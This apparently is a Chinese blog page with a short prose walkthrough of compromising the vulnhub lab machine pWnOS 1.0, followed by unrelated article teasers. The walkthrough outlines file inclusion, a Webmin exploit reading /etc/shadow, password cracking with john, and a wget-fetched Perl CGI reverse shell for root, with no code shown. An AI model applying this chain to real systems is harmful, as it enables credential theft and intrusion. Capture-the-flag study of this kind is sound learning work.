主机发现,机器开放 22, 80, 10000 端口
80 端口发现 文件包含,可读到 /etc/passwd,但是没有读到 /etc/shadow
漏洞脚本扫描结合浏览器访问观察,发现 10000 端口运行 webmin,搜索漏洞脚本利用
使用 perl 脚本读取 /etc/passwd 和 /etc/shadow 内容,使用 john 破解 shadow,拿到 vmware 用户的明文密码
使用 ssh 登录,期间配置 ssh 参数。获得初级 shell,观察无 sudo 权限,尝试提权
信息收集发现系统的 /var/www 和 /var/webmin 由 root 用户创建,权限较高,考虑尝试反弹perl cgi 反弹 shell
kali 用 php 开一个临时服务器,放上构造好的 perl CGI shell,并监听端口
shell 使用 wget 下载 反弹 shell shell.cgi,使用之前的 webmin perl 利用脚本请求 shell.cgi 的地址,因为这个脚本可以指定服务器内路径访问文件
拿到 root shell,结束

相关文章:

pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)

靶机介绍 来自 vulnhub 主机发现 ┌──(kali㉿kali)-[~/testPwnos1.0] …...

jquery on() 函数绑定无效

on 前面的元素必须在页面加载的时候就存在于 dom 里面。动态的元素或者样式等&#xff0c;可以放在 on 的第二个参数里面。jQuery on() 方法是官方推荐的绑定事件的一个方法。使用 on() 方法可以给将来动态创建的动态元素绑定指定的事件&#xff0c;例如 append 等。 <div …...

数字化转型与企业创新的双向驱动

数字化转型与企业创新的双向驱动 在全球化的竞争环境中&#xff0c;数字化转型已成为企业保持竞争力的重要手段。未来几年&#xff0c;随着信息技术的进一步发展&#xff0c;数字化转型将不仅限于IT部门&#xff0c;而是深入到企业的各个业务层面&#xff0c;推动创新和效率的…...

[uni-app]小兔鲜-07订单+支付

订单模块 基本信息渲染 import type { OrderState } from /services/constants import type { AddressItem } from ./address import type { PageParams } from /types/global/** 获取预付订单 返回信息 */ export type OrderPreResult {/** 商品集合 [ 商品信息 ] */goods: …...

Oracle数据库中表压缩的实现方式和特点

Oracle数据库中表压缩的实现方式和特点 在 Oracle 数据库中&#xff0c;表压缩是一项重要的功能&#xff0c;旨在优化存储空间和提高性能。Oracle 提供了多种表压缩技术&#xff0c;以适应不同的应用场景和需求。以下是 Oracle 数据库中表压缩的实现方式和特点&#xff1a; 1…...

【C语言】基础篇

简单输出“helloword” #include<stdio.h> int main(){printf("hello world!");return 0; } 和与商 #include<stdio.h> int main(){int a,b,sum,quotient;printf("Enter two numbers:");scanf("%d %d",&a,&b);sum a b…...

Meta MovieGen AI:颠覆性的文本生成视频技术详解

近年来&#xff0c;生成式AI技术的发展迅猛&#xff0c;尤其是在文本生成图像、文本生成视频等领域。Meta公司近期推出的MovieGen AI&#xff0c;以其强大的文本生成视频能力震撼了整个AI行业。本文将详细解读Meta MovieGen AI的核心技术、功能特性及其在实际应用中的潜力。 一…...

个人文章合集 - 前端相关

前端&#xff1a;简述表单提交前如何进行数据验证 前端&#xff1a;项目一个html中如何引入另一个html&#xff1f; 前端&#xff1a;一张图快速记忆CSS所有属性 前端&#xff1a;三个CSS预处理器(框架)-Sass、LESS 和 Stylus的比较 前端&#xff1a;基于Java角度理解nodejs/np…...

R语言的下载、安装及环境配置(RstudioVSCode)

0x01 R语言篇 一、软件介绍 R for Windows是一个免费的用于统计计算和统计制图的优秀工具&#xff0c;是R语言开发工具。它拥有数据存储和处理系统、数组运算工具&#xff08;其向量、矩阵运算方面功能尤其强大&#xff09;、完整连贯的统计分析工具、优秀的统计制图等功能。…...

解决使用重载后的CustomWidget无法正常显示但原生的QWidget却能正常显示的问题

这种情况大部分都是因为没有重写paintEvent: ​#include <QPainter> #include <QStyleOption>void CustomWidget::paintEvent(QPaintEvent *) { QStyleOption opt; opt.initFrom(this); QPainter p(this); style()->drawPrimitive(QStyle::PE_Widget, &opt,…...

微服务Sleuth解析部署使用全流程

目录 1、Sleuth链路追踪 1、添加依赖 2、修改日志配置文件 3、测试 2、zipkin可视化界面 1、docker安装 2、添加依赖 3、修改配置文件 4、查看页面 5、ribbon配置 1、Sleuth链路追踪 sleuth是链路追踪框架&#xff0c;用于在微服务架构下开发&#xff0c;各个微服务之…...

最具有世界影响力的人颜廷利:全球著名哲学家思想家起名大师

颜廷利教授&#xff0c;这位源自济南唐王镇的杰出人物&#xff0c;不仅是中国当代最杰出的国学大师之一&#xff0c;更是将传统文化与现代科技巧妙结合的先锋。他积极推崇以人工智能技术为辅助的国学研究方法&#xff0c;为这一古老领域注入了新的活力和时代表达。 除了在学术…...

Ubuntu22.04 Docker 国内安装最靠谱教程

目前docker在国内安装常存在众所周知的网络问题&#xff0c;如果安装过程如果从官网地址安装以及安装之后从官网要拉取镜像都存在问题。这篇文章主要针对这两个问题总结最靠谱的docker安装教程。 1. docker安装 1.1 系统环境概述 Ubuntu 22.04linux内核版本 6.8&#xff08;…...

ceph pg rebalance

背景 1 个 osd full 超过 85% 使用率最近有大量的数据写入及数据删除操作 $ ceph osd df tree | grep osd.158 ID CLASS WEIGHT REWEIGHT SIZE RAW USE DATA OMAP META AVAIL %USE VAR PGS STATUS TYPE NAME …...

大模型/Sora/世界模型之间是什么关系,对自动驾驶的意义是什么?

什么是大模型 人工智能大模型&#xff08;Artificial Intelligence Large Model&#xff0c;简称AI大模型&#xff09;是指具有庞大的参数规模和复杂程度的机器学习模型。通常指的是参数量非常大、数据量非常大的深度学习模型。 大模型通常由数百万到数十亿的参数组成&#x…...

17岁孩子开发AI应用,4个月入百万,人人都是AI产品经理的时代快来了

随着AI时代的到来叠加经济下行&#xff0c;越来越多的独立开发者梦想着实现年入百万的壮举。 近日&#xff0c;这种小概率事件正在发生。 17岁高中生做了个AI APP&#xff0c;短短四个月销售额达100 万美元。 小伙儿Zach Yadegari&#xff08;下面暂称小扎克&#xff09;在X…...

Django一分钟:DRF ViewSet烹饪指南,创建好用的视图集

本文将介绍django视图集的内部实现&#xff0c;并带你重写部分代码自己组装强大且趁手的视图集&#xff0c;以满足自定义的业务需求&#xff0c;避免编写大量重复代码。 一、基础知识 Django Rest framework框架允许你将一组相关视图的逻辑组合到一个类中&#xff0c;也就是我…...

SEO友好的wordpress模板 应该具体哪些特征

在数字营销的时代&#xff0c;搜索引擎优化(SEO)对于任何网站来说都是至关重要的。WordPress作为全球最受欢迎的内容管理系统之一&#xff0c;提供了大量的模板(也称为主题)供用户选择。一个SEO友好的WordPress模板不仅可以帮助您的网站在搜索引擎中获得更好的排名&#xff0c;…...

1.MySQL存储过程基础(1/10)

引言 数据库管理系统&#xff08;Database Management System, DBMS&#xff09;是现代信息技术中不可或缺的一部分。它提供了一种系统化的方法来创建、检索、更新和管理数据。DBMS的重要性体现在以下几个方面&#xff1a; 数据组织&#xff1a;DBMS 允许数据以结构化的方式存…...

linux中使用docker命令时提示权限不足

问题&#xff1a;成功安装docker后&#xff0c;使用docker相关命令时提示权限不足&#xff08;permission denied&#xff09; liubailiubai:~$ docker version Client: Version: 24.0.5 API version: 1.43 Go version: go1.20.14 Git commit: ced0996 Built: Tue Jun 25 22:3…...

Python实现prophet 理论及参数优化

文章目录 Prophet理论及模型参数介绍Python代码完整实现prophet 添加外部数据进行模型优化 之前初步学习prophet的时候&#xff0c;写过一篇简单实现&#xff0c;后期随着对该模型的深入研究&#xff0c;本次记录涉及到prophet 的公式以及参数调优&#xff0c;从公式可以更直观…...

高等数学(下)题型笔记(八)空间解析几何与向量代数

目录 0 前言 1 向量的点乘 1.1 基本公式 1.2 例题 2 向量的叉乘 2.1 基础知识 2.2 例题 3 空间平面方程 3.1 基础知识 3.2 例题 4 空间直线方程 4.1 基础知识 4.2 例题 5 旋转曲面及其方程 5.1 基础知识 5.2 例题 6 空间曲面的法线与切平面 6.1 基础知识 6.2…...

Mac软件卸载指南,简单易懂!

刚和Adobe分手&#xff0c;它却总在Library里给你写"回忆录"&#xff1f;卸载的Final Cut Pro像电子幽灵般阴魂不散&#xff1f;总是会有残留文件&#xff0c;别慌&#xff01;这份Mac软件卸载指南&#xff0c;将用最硬核的方式教你"数字分手术"&#xff0…...

论文浅尝 | 基于判别指令微调生成式大语言模型的知识图谱补全方法(ISWC2024)

笔记整理&#xff1a;刘治强&#xff0c;浙江大学硕士生&#xff0c;研究方向为知识图谱表示学习&#xff0c;大语言模型 论文链接&#xff1a;http://arxiv.org/abs/2407.16127 发表会议&#xff1a;ISWC 2024 1. 动机 传统的知识图谱补全&#xff08;KGC&#xff09;模型通过…...

《基于Apache Flink的流处理》笔记

思维导图 1-3 章 4-7章 8-11 章 参考资料 源码&#xff1a; https://github.com/streaming-with-flink 博客 https://flink.apache.org/bloghttps://www.ververica.com/blog 聚会及会议 https://flink-forward.orghttps://www.meetup.com/topics/apache-flink https://n…...

Map相关知识

数据结构 二叉树 二叉树&#xff0c;顾名思义&#xff0c;每个节点最多有两个“叉”&#xff0c;也就是两个子节点&#xff0c;分别是左子 节点和右子节点。不过&#xff0c;二叉树并不要求每个节点都有两个子节点&#xff0c;有的节点只 有左子节点&#xff0c;有的节点只有…...

【Nginx】使用 Nginx+Lua 实现基于 IP 的访问频率限制

使用 NginxLua 实现基于 IP 的访问频率限制 在高并发场景下&#xff0c;限制某个 IP 的访问频率是非常重要的&#xff0c;可以有效防止恶意攻击或错误配置导致的服务宕机。以下是一个详细的实现方案&#xff0c;使用 Nginx 和 Lua 脚本结合 Redis 来实现基于 IP 的访问频率限制…...

适应性Java用于现代 API:REST、GraphQL 和事件驱动

在快速发展的软件开发领域&#xff0c;REST、GraphQL 和事件驱动架构等新的 API 标准对于构建可扩展、高效的系统至关重要。Java 在现代 API 方面以其在企业应用中的稳定性而闻名&#xff0c;不断适应这些现代范式的需求。随着不断发展的生态系统&#xff0c;Java 在现代 API 方…...

Ubuntu Cursor升级成v1.0

0. 当前版本低 使用当前 Cursor v0.50时 GitHub Copilot Chat 打不开&#xff0c;快捷键也不好用&#xff0c;当看到 Cursor 升级后&#xff0c;还是蛮高兴的 1. 下载 Cursor 下载地址&#xff1a;https://www.cursor.com/cn/downloads 点击下载 Linux (x64) &#xff0c;…...

MyBatis中关于缓存的理解

MyBatis缓存 MyBatis系统当中默认定义两级缓存&#xff1a;一级缓存、二级缓存 默认情况下&#xff0c;只有一级缓存开启&#xff08;sqlSession级别的缓存&#xff09;二级缓存需要手动开启配置&#xff0c;需要局域namespace级别的缓存 一级缓存&#xff08;本地缓存&#…...